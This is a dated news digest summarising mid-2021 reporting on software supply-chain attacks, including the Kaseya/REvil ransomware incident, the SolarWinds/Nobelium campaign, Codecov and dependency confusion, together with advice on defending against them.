Independence Day: REvil uses supply chain exploits to attack hundreds of businesses

REvil’s operators posted to their “Happy Blog”, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they need to be paid $70,000,000 worth of BitCoin.

Ref - Sophos 

_______________________________________________________________________________________

(July 4, 2021)

How U.S. cyber policy changed after SolarWinds

Since the disclosure of SolarWinds attacks and since the formation of the new government in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.

Ref - CBS News 

_______________________________________________________________________________________

(July 3, 2021)

Kaseya ransomware supply chain attack: Key things to know

Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.

Ref - Symantec

_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack hits nearly 40 service providers

Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.


_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply?chain attack: What we know so far

Kaseya IT management software, commonly used in Managed Service Provider (MSP) environments, had been hit by another in a series of supply-chain hacks. As with the SolarWinds incident, this latest attack uses a two-step malware delivery process sliding through the back door of tech environments. The cybercriminals behind this attack apparently had monetary gain rather than cyber espionage in their sights, eventually planting ransomware while exploiting the trust relationship between Kaseya and its customers.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware gang executes supply chain attack via malicious Kaseya update

The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware hits 1,000+ companies in MSP supply-chain attack

Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.


_______________________________________________________________________________________

(July 2, 2021)

Kaseya VSA Supply-Chain Ransomware Attack

CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.

Ref - US Cert 

_______________________________________________________________________________________

(July 2, 2021)

Improve supply chain security with intelligence from surface, deep & dark web

In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.


_______________________________________________________________________________________

(July 1, 2021)

Kaseya VSA supply-chain ransomware attack -Sophos report

Sophos said that the supply chain attack that uses Kaseya to deploy a variant of the REvil ransomware into a victim’s environment is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA Servers.

Ref - Sophos

_______________________________________________________________________________________

(June 30, 2021)

11 Tactics to prevent supply chain attacks

To prevent supply chain attacks, organizations can follow these strategies. They are required to implement Honeytokens, secure Privileged Access Management, and implement a Zero Trust Architecture. They should prepare for security by assuming that they will be attacked for sure.

Ref - Upguard 

_______________________________________________________________________________________

(June 29, 2021)

Improving the security of your supply chain through integration

To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.

Ref - Mimecast 

_______________________________________________________________________________________

(June 29, 2021)

Zero-Trust doesn’t mean zero breaches

The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.

Ref - Forrester 

_______________________________________________________________________________________

(June 29, 2021)

Denmark's central bank exposed in SolarWinds hack

Denmark's central bank was compromised in last year's global SolarWinds hacking operation, leaving a "backdoor" to its network open for seven months. A backdoor stood open at the Danish central bank for seven months until it was discovered by U.S. security firm Fire Eye, Version2 said, citing various documents it obtained under a freedom of information request, such as SolarWinds emails.

Ref - Reuters 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies an average of $12 million

A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about Solarwinds attacks. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.


_______________________________________________________________________________________

(June 28, 2021)


Some UW institutions used software compromised by Russian hackers - US Officials

Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.

Ref - WPR.org 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds hackers continue the assault with a new Microsoft breach

The Nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses.

Ref - Wired 

_______________________________________________________________________________________

(June 28, 2021)


Microsoft says new breach discovered in probe of suspected SolarWinds hackers

Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.

Ref - Reuters

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies in key sectors 11% of total annual revenue

IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.


_______________________________________________________________________________________

(June 27, 2021)


IT companies bear brunt of new SolarWinds hacker attacks

IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.

Ref - ARNNet

_______________________________________________________________________________________

(June 26, 2021)


Microsoft says SolarWinds hackers attacked three in a new breach

Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.

Ref - Yahoo 

_______________________________________________________________________________________

(June 26, 2021)


Microsoft admits to signing rootkit malware in supply-chain fiasco

Microsoft has confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs. The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions.


_______________________________________________________________________________________

(June 25, 2021)


The majority of large businesses caught up in supply chain attacks last year

The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.

Ref - ITProportal 

_______________________________________________________________________________________

(June 25, 2021)


New Nobelium activity disclosed by Microsoft

The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.

Ref - Microsoft 

_______________________________________________________________________________________

(June 24, 2021)


Atlassian bugs could have led to a 1-click takeover

A supply-chain attack could have siphoned sensitive information out of Jira, such as security issues on Atlassian cloud, Bitbucket, and on-prem products. By exploiting the bug, with just one click, an attacker could have siphoned sensitive information out of Jira. The flaws could have also enabled an attacker to take over accounts and to control some of Atlassian’s applications, including Jira and Confluence.

Ref - ThreatPost 

_______________________________________________________________________________________

(June 24, 2021)


The power of anonymity in supply chain security

A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.


_______________________________________________________________________________________

(June 24, 2021)


Shifting left with analytics to identify software supply chain anomalies

The supply chain can be compromised in part due to a lack of security monitoring and oversight for the coding and delivery of software (continuous integration/continuous delivery (CI/CD) pipelines), which creates a dangerous security gap. This gap widens because security testing does not test for changes in the software systems.

 
_______________________________________________________________________________________

(June 24, 2021)


A supply-chain breach: Taking over an Atlassian account

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of Atlassian apps connected through SSO. Further details about this have been recently released by Check Point. According to them, once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors that he can use in the future for his supply-chain attacks.

 
_______________________________________________________________________________________

(June 23, 2021)


SUNBURST: Attack Flow, C2 Protocol, and Prevention

The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code, “obfuscated” with casual naming, trying to evade shallow review, it has many subtleties yet to uncover. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and conditions required for execution. The main goal of this investigation is to find infected beaconing machines.

Ref - CYNet 

_______________________________________________________________________________________

(June 22, 2021)


Hackers are trying to attack big companies, and small suppliers are the weakest link

Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense company subcontractor firms.. It was found that over half had severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, making them vulnerable to cyberattacks including data breaches and ransomware.

Ref - ZDNet 

_______________________________________________________________________________________

(June 22, 2021)


An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for Linux platform that could be potentially abused to stage supply-chain attacks and achieve remote code execution (RCE).


_______________________________________________________________________________________

(June 22, 2021)


Three lessons CISOs can learn from the SolarWinds cyberattack

Here are some lessons that CISOs learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, Inventory management with optimal cyber hygiene, implementation of a Zero trust model, and role-based access to privileged accounts can help minimize the risks.

 
_______________________________________________________________________________________

(June 22, 2021)


Government-mandated SBOMs to throw light on software supply chain security

An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.

Ref - CSO Online 

_______________________________________________________________________________________

(June 22, 2021)


U.S. SEC probing SolarWinds clients over cyber breach disclosures

The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.

Ref - Reuters 

_______________________________________________________________________________________

(June 21, 2021)


CISA doesn't know how many US federal agencies use firewalls

The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.


_______________________________________________________________________________________

(June 21, 2021)


Attacks against container infrastructures increasing, including supply chain attacks

Hiding an attack during a CI build can succeed in most organizations’ CI environments. This attack targets supply-chain processes and could be modified to target other hidden supply chain components, processes, or even the build artifacts themselves, which can pose a severe threat.

 
_______________________________________________________________________________________

(June 21, 2021)


Lessons from the JBS attack for securing the manufacturing supply chain

There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.


_______________________________________________________________________________________

(June 21, 2021)


Software-container supply chain sees spike in attacks

Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.

Ref - Darkreading 

_______________________________________________________________________________________

(June 21, 2021)


SolarWinds hack could have been deterred by simple security measures

The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.

Ref - The Hill

_______________________________________________________________________________________

(June 18, 2021)


Google dishes out homemade SLSA to thwart software supply-chain attacks

Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.

Ref - The Register 

_______________________________________________________________________________________

(June 18, 2021)


How PAM can protect feds from third-party/ service account cyber attacks

PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.

Ref - Meritalk

_______________________________________________________________________________________

(June 17, 2021)


Firmware security requires firm supply chain agreements

According to Bloomberg, China’s theft of technology is the biggest threat to corporate America and the US military. And the Russians are experts at infiltrating the supply chain of trusted code as witnessed by the recent SolarWinds breach, along with 20-years’ worth of cyber espionage and attacks. Organizations need to actively embed security controls before they take possession of a product.


_______________________________________________________________________________________

(June 17, 2021)


Lessons learned from the SolarWinds cyberattack and the future of NY-DFS

The New York DFS alerted DFS-regulated entities of the SolarWinds Attack on December 18, 2020, through the "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately with 94% of impacted companies removing the vulnerable systems caused by the SolarWinds hackers from their networks (and or patching them) within three days of being notified of the attack. However, DFS noted gaps in cybersecurity policies of several regulated entities, including irregularities in patching and patch management systems, etc.

Ref - Mondaq 

_______________________________________________________________________________________

(June 17, 2021)


UNC2465 cybercrime group launched a supply chain attack on CCTV vendor

An affiliate of the Darkside ransomware gang, tracked as UNC2465, has conducted a supply chain attack against a CCTV vendor Dahua’s SmartPSS Windows app. UNC2465 is considered one of the main affiliates of the DARKSIDE group, along with other affiliated gangs tracked by FireEye/Mandiant as UNC2628 and UNC2659.


_______________________________________________________________________________________

(June 17, 2021)


The SolarWinds attack and its lessons

The increase in sophisticated and complex cyber-attacks like SolarWinds requires a change in the traditional security paradigm by increasing the priority of cyber-security and policies. Two types of policies have been introduced, including the prevention and problem-solving policies.


_______________________________________________________________________________________

(June 16, 2021)


Everything you need to know about SolarWinds hack

The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.

Ref - TechTarget 

_______________________________________________________________________________________

(June 16, 2021)


Smoking out a Darkside affiliate’s supply chain software compromise

Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. 

Ref - FireEye
 
_______________________________________________________________________________________

(June 16, 2021)


New ThroughTek IoT supply chain vulnerability announced

DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.


_______________________________________________________________________________________

(June 16, 2021)


Darkside operator involved in supply chain attack via CCTV vendor’s website

A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.

Ref - The Record 

_______________________________________________________________________________________

(June 16, 2021)


Supply chain attacks and vulnerability disclosures

SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year’s victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest attack on supply chains is on Edward Don and Company, a known distributor of foodservice equipment and supplies in the U.S.

Ref - ECCouncil 

_______________________________________________________________________________________

(June 16, 2021)


SolarWinds’ transparency trying to ensure others are safer

Sudhakar Ramakrishna, President, and CEO at Solarwinds revealed his thoughts about the importance of continuous learning from everything, be it a bug or a cyber incident. These learnings will fortify what can be done going forward to make it that much more difficult for a threat actor to perform their attacks.

Ref - Carahsoft 

_______________________________________________________________________________________

(June 14, 2021)


How to ensure third parties don't compromise the organizational supply chain

Organizations can probably count many third-party vendors in their IT environment vital in storing, securing, and analyzing their data. Most times, however, companies only assess the security of these third-party products when they’re onboarded. There’s no continuous security analysis or assessment. They should demand a monthly security risk assessment report from all third-party vendors to glean details on all known issues in their product and infrastructure.


_______________________________________________________________________________________

(June 14, 2021)


Codecov to retire the Bash script responsible for supply chain attack wave

Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack. The new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.

Ref - ZDNet 

_______________________________________________________________________________________

(June 13, 2021)


SolarWinds hack emboldened cyberattackers for ransomware attack spree

When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.

Ref - Yahoo 

_______________________________________________________________________________________

(June 11, 2021)


Monumental supply-chain attack on Airlines traced to APT41

A monster cyberattack on SITA, a global IT provider for 90 percent of the world’s airline industry, is slowly unfolding to reveal the largest supply-chain attack on the airline industry in history. After Air India revealed the details of its security breach, it became clear that the carriers were most likely dealing with one of the biggest supply-chain attacks in the airline industry’s history, potentially traced back to the Chinese state-sponsored threat actor APT41.

 
_______________________________________________________________________________________

(June 10, 2021)


Mitigating third-party risks with effective cyber risk management

When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties and that the third parties that hold and use that data, are effectively an extension of the customer’s business.


_______________________________________________________________________________________

(June 10, 2021)


What SolarWinds taught enterprises about data protection

The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted the level of potential devastation had the SolarWinds’ hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.


_______________________________________________________________________________________

(June 9, 2021)


Hardening the physical security supply chain to mitigate the cyber-risk

A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.

 
_______________________________________________________________________________________

(June 9, 2021)


How to stop SolarWinds-like hacks

Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on the idea of using “physically unclonable functions (PUFs).” At a microscopic level, even mass-produced computer chips have tiny differences from one chip to the next. For example, an online bank can check a device’s PUF to make sure that only someone with the right device is accessing a bank account. This can help detect the attacks involving bypass two-factor authentication, which SolarWinds attackers exploited.

Ref - Nautil.us 

_______________________________________________________________________________________

(June 9, 2021)


Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack

ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.


_______________________________________________________________________________________

(June 8, 2021)


Protecting Industrial Control Systems against cyberattacks

ICS infrastructures are challenged to confirm the security of the supply chain for the OT system devices and sensors they rely on. There is no requirement to comply with the ISO 27001-2013 standard, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted method of software deliveries.


_______________________________________________________________________________________

(June 8, 2021)


The next phase of software supply chain security

The recent executive order by President Joe Biden does several important things related to software supply chain security. It requires the NIST to develop baseline security standards for software used by government agencies. Those standards are required to encompass secure software development environments, including such actions as using administratively separate build environments; auditing trust relationships.


_______________________________________________________________________________________

(June 8, 2021)


The rise and rise of supply chain attacks

There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.


 _______________________________________________________________________________________

(June 8, 2021)


Supply chain security awareness - Key risk factors

As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.


_______________________________________________________________________________________

(June 7, 2021)


Defending against Software supply chain attacks: Recommendations from NIST

Given the sparsity of rapid mitigation options in the event of a software supply chain attack (because the victim organization doesn’t have the authority to command a timely response from their software vendor), it’s far more beneficial to invest in preventive measures. Experts recommend using a risk management lens when purchasing software and ask prospective vendors for compliance verifications.


_______________________________________________________________________________________

(June 6, 2021)


Why are supply chain attacks scary?

Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.

 
_______________________________________________________________________________________

(June 5, 2021)


CEO of Mandiant talks about SolarWinds hack

Kevin Mandia, CEO of Mandiant, pointed out in an interview at the WSJ Cybersecurity about the ongoing attempt to define what is and is not considered cyberwar and grounds for retaliation by the US government. He commented that “apparently supply chain attacks are fair game.”

Ref - Medium 

_______________________________________________________________________________________

(June 4, 2021)


Strengthening US cybersecurity: Impacts of the Executive Order

Even though the specifics of the executive order are not available today, compliance officers can start to anticipate the changes the business will need to make. First, they can expect to perform a fresh assessment of compliance risks under these new cybersecurity requirements. Second, they need to consider the new policies and procedures your business might need to implement.

Ref - JD Supra 

_______________________________________________________________________________________

(June 4, 2021)


As cyberattacks surge, Biden seeks to mount a better defense

As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.

Ref - NPR

 _______________________________________________________________________________________

(June 3, 2021)


Dependency confusion: Compromising the supply chain

Researchers demonstrated that if a bad actor registers the private names on public package repositories and upload public libraries that contain malicious code, the code could be pushed from internal applications and results in data exfiltration or remote code execution. The researcher details how he successfully exploited this vector to infiltrate code and secure large bug bounties from Apple, Shopify, Microsoft, and PayPal among others.


_______________________________________________________________________________________

(June 3, 2021)


Organizations are still wondering about Dependency Confusion attacks

In early February of 2021, a vulnerability was revealed in the npm repository, infiltrating major technology companies, including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of similar copycat efforts appearing on the npm repository. While routing rules can manage some of the issues around this for internal repositories, these require manual adjustment and quickly go out of date, so automation is necessary to keep on top of this issue.

Ref - Sonatype 

_______________________________________________________________________________________

(June 3, 2021)


Challenges with protecting the Supply Chain

With regards to protecting the supply chain, first businesses should take the steps to identify key assets, identify partners, and what access these partners have to the key assets. Industry frameworks like NIST, OWASP, CISSP Controls, etc, all stipulate the understanding of where critical assets are, be it hardware, software, endpoints, or applications. However, compiling these lists is a struggle for most. 

Ref - Toolbox 

_______________________________________________________________________________________

(June 3, 2021)


Japanese government agencies suffered supply chain attack exposing proprietary data

Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu’s “ProjectWEB” information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyber attack affected the Japanese Ministry of Land, Infrastructure, Transport, Tourism, the Cabinet Secretariat, and the Narita International Airport.

Ref - CPO Magazine 

_______________________________________________________________________________________

(June 2, 2021)


Proactive security key to combating supply chain attacks

Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.


_______________________________________________________________________________________

(June 1, 2021)


NobleBaron poisoned installers could be used in supply chain attacks

The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.

Ref - SentinelOne 

_______________________________________________________________________________________

(June 1, 2021)


SolarWinds attack was an attack on trust

The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.

Ref - IT Web 

_______________________________________________________________________________________

(June 1, 2021)


The U.S. seizes domains used by SolarWinds hackers

The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding the action was aimed at disrupting the threat actors' follow-on exploitation of victims as well as block their ability to compromise new systems.


_______________________________________________________________________________________

(June 1, 2021)


Defining linchpins: An industry perspective on remediating Sunburst

The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software. 

Ref - CSO Online 

_______________________________________________________________________________________

(May 31, 2021)


CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service

According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.


_______________________________________________________________________________________

(May 31, 2021)


Why are supply chain attacks so dangerous?

By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.

Ref - Wired

 _______________________________________________________________________________________

(May 31, 2021)


SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks

The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.

Ref - Forbes

_______________________________________________________________________________________

(May 30, 2021)


Defending and deterring the Nobelium attacks

Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.

Ref - Microsoft 

_______________________________________________________________________________________

(May 29, 2021)


Biden budget sets aside $750 million for SolarWinds response

U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.

Ref - Yahoo
 
_______________________________________________________________________________________

(May 28, 2021)


Breaking down Nobelium’s latest early-stage toolset

Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.

Ref - Microsoft 

_______________________________________________________________________________________

(May 28, 2021)


Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs

CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.

Ref - CISA 

_______________________________________________________________________________________

(May 28, 2021)


The key lesson from the SolarWinds hack is visibility

The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?

Ref - CIO 

_______________________________________________________________________________________

(May 28, 2021)


How Nobelium leveraged Constant Contact in the Phishing campaign

